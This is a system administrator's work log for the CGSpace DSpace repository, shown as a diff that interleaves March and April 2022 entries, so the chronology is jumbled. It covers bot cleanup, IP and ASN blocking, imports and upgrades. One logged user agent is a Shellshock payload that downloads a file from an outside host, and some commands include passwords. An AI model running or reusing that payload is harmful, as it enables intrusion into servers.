March, 2022
+April, 2022

2022-03-01
+2022-04-01

- Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
-$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
-$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
-$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
-
2022-03-04
+-
-
- Looking over the CGSpace Solr statistics from 2022-02
  - I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!
  - Here are some of the more prevalent or weird ones:
    - axios/0.21.1
    - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
    - Nutraspace/Nutch-1.2 (www.nutraspace.com)
    - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
    - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
    - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
    - Crowsnest/0.5 (+http://www.crowsnest.tv/)
    - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
    - metha/0.2.27
    - ZaloPC-win32-24v454
    - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
    - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
    - FullStoryBot/1.0 (+https://www.fullstory.com)
    - Link Validity Check From: http://www.usgs.gov
    - OSPScraper (+https://www.opensyllabusproject.org)
    - () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"
  - I submitted a pull request to COUNTER-Robots with some of these
- I purged a bunch of hits from the stats using the check-spider-hits.sh script:

$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics

Total number of bot hits purged: 12914
-
-
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
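
These local overrides are just one regex pattern per line in the ILRI agents file that check-spider-hits.sh reads from; a minimal sketch of appending a few of the new ones (the exact patterns I added may differ):

$ cat >> dspace/config/spiders/agents/ilri <<'EOF'
axios\/[0-9]
Faveeo\/[0-9]
Crowsnest\/[0-9]
EOF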

2022-03-05

- Start AReS harvest

2022-03-10

- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
-
-
-
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
-
2022-03-12

+- The Discovery indexing took this long:

+real 334m33.625s
+user 227m51.331s
+sys 3m43.037s

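For reference, that timing comes from wrapping the full Discovery reindex in time; roughly (this may not be the exact invocation):

$ time dspace index-discovery -b
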
2022-04-04
-
-
- Update all containers and rebuild OpenRXV on linode20:
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
-$ docker-compose build
-
-
-
- Then run all system updates and reboot
- Start a full harvest on AReS
2022-03-16

- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing

+- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: Apache-HttpClient/4.5.9 (Java/1.8.0_322), and many others with a normal browser agent, so that’s fishy!
+- The DSpace agent pattern http.?agent seems to have caught the first ones, but I’ll purge the IP ones
+- I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for dns:*msnbot* AND dns:*.msn.com. I see over 100,000, which is a problem I noticed a few months ago too…
+- I extracted the MSN Bot IPs from Solr using an IP facet, then used the check-spider-ip-hits.sh script to purge them
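
For reference, a sketch of one way to pull those IPs out of the statistics core with a facet query (not necessarily exactly what I ran; the Solr port is an assumption):

$ curl -s -G 'http://localhost:8081/solr/statistics/select' \
    --data-urlencode 'q=dns:*msnbot* AND dns:*.msn.com.' \
    --data-urlencode 'rows=0' \
    --data-urlencode 'facet=true' \
    --data-urlencode 'facet.field=ip' \
    --data-urlencode 'facet.limit=-1' \
    --data-urlencode 'facet.mincount=1'

The non-zero facet values then go into a text file that check-spider-ip-hits.sh takes with -f.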
2022-03-20
+2022-04-10
- Start a full harvest on AReS
2022-03-21
+2022-04-13
-
-
- Review a few submissions for Open Repositories 2022
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed
2022-03-22
+-
-
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
-
-
-
- I had been meaning to update my local database…
- I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails:
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
-$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
-
-
-
- On my local environment I decided to run the check-duplicates.py script one more time with all 700 items:

$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
-$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
-$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
-$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
-
-
-
- I sent the resulting 76 items to Gaia to check
- UptimeRobot said that CGSpace was down
-
-
-
- I looked and found many locks belonging to the REST API application:
+- I looked and found the load at 44…
+- There seem to be a lot of locks from the XMLUI:

$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
    301 dspaceWeb
   2390 dspaceApi
+  3173 dspaceWeb
-
-
- Looking at nginx’s logs, I found the top addresses making requests today:
+- Looking at the top IPs in nginx’s access log, one IP in particular stands out:

# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
   1977 45.5.184.2
   3167 70.32.90.172
   4754 54.195.118.125
   5411 205.186.128.185
   6826 137.184.159.211
+   941 66.249.66.222
+  1224 95.108.213.28
+  2074 157.90.209.76
+  3064 66.249.66.221
+ 95743 185.192.69.15
-- 137.184.159.211 is on DigitalOcean using this user agent: GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28
-
-- I blocked this IP in nginx and the load went down immediately
+- 185.192.69.15 is in the UK
+- I added a block for that IP in nginx and the load went down…
-
-- 205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot
-- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
-- 70.32.90.172 is on Media Temple and has no user agent
-- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
-- I verified it works as expected with an empty user agent:

-$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
-Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.

2022-04-16

+- Start harvest on AReS

+2022-04-18

+- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)
+- I see there are many locks in use from the XMLUI:

+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+   8932 dspaceWeb
-- I note that the nginx log shows ‘-’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘-’, for example these were successful:
+- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
-70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
-70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
+ 752 69.162.124.231
+ 759 66.249.64.213
+ 864 66.249.66.222
+ 905 2a01:4f8:221:f::2
+ 1013 84.33.2.97
+ 1201 157.55.39.159
+ 1204 157.55.39.144
+ 1209 157.55.39.102
+ 1217 157.55.39.161
+ 1252 207.46.13.177
+ 1274 157.55.39.162
+ 2553 66.249.66.221
+ 2941 95.108.213.28
-- I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too
-- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that
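A rough sketch of what an nginx rule for the literal '-' user agent could look like (not our actual config, just the shape of it; the map belongs in the http context and the checks in the server block):

# http context: flag empty and literal "-" user agents
map $http_user_agent $bad_user_agent {
    default 0;
    ""      1;
    "-"     1;
}

# server context: reject flagged requests, and deny single abusive IPs outright
if ($bad_user_agent) {
    return 403;
}
deny 137.184.159.211;
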
+- One IP is using a strange user agent though:

+84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
-2022-03-24
-
-- Maria from ABC asked about a reporting discrepancy on AReS
-
-- I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week
-
-
-- Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted
-
-- She asked if we can download them and upload them directly to CGSpace
-
-
-- I re-created my local Artifactory container
-- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
-
-- One thing I realized is that OAI is no longer a standalone web application, it is part of the server app now: http://localhost:8080/server/oai/request?verb=Identify
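
A quick sanity check of that endpoint (just a sketch):

$ curl -s 'http://localhost:8080/server/oai/request?verb=Identify'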
-
-
-- Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active
-
-- I did this on DSpace Test in 2022-02 so I just followed the same procedure
-- After that I ran all system updates and rebooted the server
-
-
-
-2022-03-25
-
-- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
-
-
-
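A quick way to check this (a sketch; the database name and the metadatavalue table are the usual DSpace ones):

$ psql -c "SELECT pg_size_pretty(pg_database_size('dspace'));"
$ psql dspace -c "SELECT pg_size_pretty(pg_indexes_size('metadatavalue'));"
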
-- The space saving in indexes of recent PostgreSQL releases is awesome!
-- Import a DSpace 6.x database dump from production into my local DSpace 7 database
-
-- I still see the same errors I saw in 2021-04 when testing DSpace 7.0 beta 5
-- I had to delete some old migrations, as well as all Atmire ones first:
-
-
-
-localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
-localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%'
-- Then I was able to migrate to DSpace 7 with dspace database migrate ignored as the DSpace upgrade notes say
+ - Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+17314
+
+- That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
-- I see that the flash of unstyled content bug still exists on dspace-angular… ouch!
+- The ISPs I’ve seen so far are ChinaNet and China Unicom
+- I extracted all the IPs from today and resolved them:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
+
+- The top ASNs by IP are:
+
+$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+ 102 GOOGLE
+ 139 Maxihost LTDA
+ 165 AMAZON-02
+ 393 "China Mobile Communications Group Co., Ltd."
+ 473 AMAZON-AES
+ 616 China Mobile communications corporation
+ 642 M247 Ltd
+ 2336 HostRoyale Technologies Pvt Ltd
+ 4556 Chinanet
+ 5527 CHINA UNICOM China169 Backbone
+$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+ 139 262287
+ 165 16509
+ 180 204287
+ 393 9808
+ 473 14618
+ 615 56041
+ 642 9009
+ 2156 203020
+ 4556 4134
+ 5527 4837
+
+- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
+- I will download the IP blocks for each ASN except Google and Amazon and ban them
+
+$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
+20296
+
+- I extracted the IPv4 and IPv6 networks:
+
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
+
+- I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:
+
+$ wc -l /tmp/ipv4-networks.txt
+15464 /tmp/ipv4-networks.txt
+$ aggregate6 /tmp/ipv4-networks.txt | wc -l
+2781
+$ wc -l /tmp/ipv6-networks.txt
+4833 /tmp/ipv6-networks.txt
+$ aggregate6 /tmp/ipv6-networks.txt | wc -l
+338
+
+- I deployed these lists on CGSpace, ran all updates, and rebooted the server
+
+- This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?
+- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
+
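For reference, deploying such a list with nftables boils down to an interval set plus a drop rule; a minimal sketch (the set name and the two example networks are placeholders; the real lists come from the aggregated files above):

table inet filter {
    set abusive_networks4 {
        type ipv4_addr
        flags interval
        # example elements only; in practice the full aggregated list is loaded here
        elements = { 36.96.0.0/11, 218.0.0.0/11 }
    }

    chain input {
        type filter hook input priority 0; policy accept;
        ip saddr @abusive_networks4 drop
    }
}
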
+
+- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
+
+
+
+
+- I used grepcidr with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
+
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
+# wc -l /tmp/ipv4-ips.txt
+15313 /tmp/ipv4-ips.txt
+# wc -l /tmp/ipv6-ips.txt
+19 /tmp/ipv6-ips.txt
+
+- Then I purged them from Solr using the check-spider-ip-hits.sh script:
+
+$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
+
2022-04-23
+
+- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the example file that contains most patterns
+
+- I updated CGSpace, then ran all system updates and rebooted the host
+- I also ran dspace cleanup -v to prune the database
+
+
+
+2022-04-24
+
- Start a harvest on AReS
-2022-03-26
-
-- Update dspace-statistics-api to Falcon 3.1.0 and release v1.4.3
-
-2022-03-28
-
-- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
-
-$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
-
-- I added the account to the Alliance Admins account, which should allow him to submit to any Alliance collection
-
-- According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
-
-
-- Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”
-
-- We asked Peter and he said we should delete them
-- I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them
-
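Roughly, the export and the expunge import look like this (a sketch; the community handle and eperson are placeholders):

$ dspace metadata-export -i 10568/XXXXX -f /tmp/cta.csv
# filter the rows whose title is "delete" in OpenRefine and add an "action" column with the value "expunge"
$ dspace metadata-import -f /tmp/cta-delete.csv -e fuuu@example.com
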
-
-- I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
-
-- I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansible infrastructure playbooks
-
-
-
-2022-03-29
-
-- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
-
-- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
-
-
-
-or(
-isNotNull(value.match('33')),
-isNotNull(value.match('179')),
-isNotNull(value.match('452')),
-isNotNull(value.match('489')),
-isNotNull(value.match('541')),
-isNotNull(value.match('568')),
-isNotNull(value.match('646')),
-isNotNull(value.match('889'))
-)
-
-- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
-
-$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
-$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
-$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
-
-- After that I did some normalization on the cg.subject.system metadata and extracted a few dozen countries to the country field
-- Start a harvest on AReS
-
-2022-03-30
-
-- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
-
-$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
-
-- I started looking into the request regarding the CIAT Library PDFs
-
-- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
-- The links seem to be down though! I emailed Paola to ask
-
-
-
-2022-03-31
-
-- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
-- I will do the following for CMS and G1GC on DSpace Test:
-
-- Wait for startup
-- Reload home page
-- Log in
-- Do a search for “livestock”
-- Click AGROVOC facet for livestock
-- dspace index-discovery -b
-- dspace-statistics-api index
-
-
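For reference, the collector switch itself is just a change to the JVM options Tomcat starts with; a rough sketch (heap sizes here are illustrative, not our actual values):

# CMS, what DSpace Test is running for this round of tests
CATALINA_OPTS="-Xms3g -Xmx3g -XX:+UseConcMarkSweepGC"
# G1GC, what I want to evaluate next
CATALINA_OPTS="-Xms3g -Xmx3g -XX:+UseG1GC"
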
-- With CMS the Discovery Index took:
-
-real 379m19.245s
-user 267m17.704s
-sys 4m2.937s
-
-- Leroy from CIAT said that the CIAT Library server has security issues so it was limited to internal traffic
-
-- I extracted a list of URLs from CGSpace to send him:
-
-
-
-localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
-COPY 4552
-
-- I did some checks and cleanups in OpenRefine because there are some values with “#page” etc
-
-- Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs
-- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
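
For the record, a rough way to reproduce that count outside of OpenRefine (a sketch; it just strips the URL fragments and de-duplicates):

$ sed 1d /tmp/2022-03-31-ciat-library-urls.csv | sed -e 's/#.*$//' | sort -u | wc -l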
-
-
-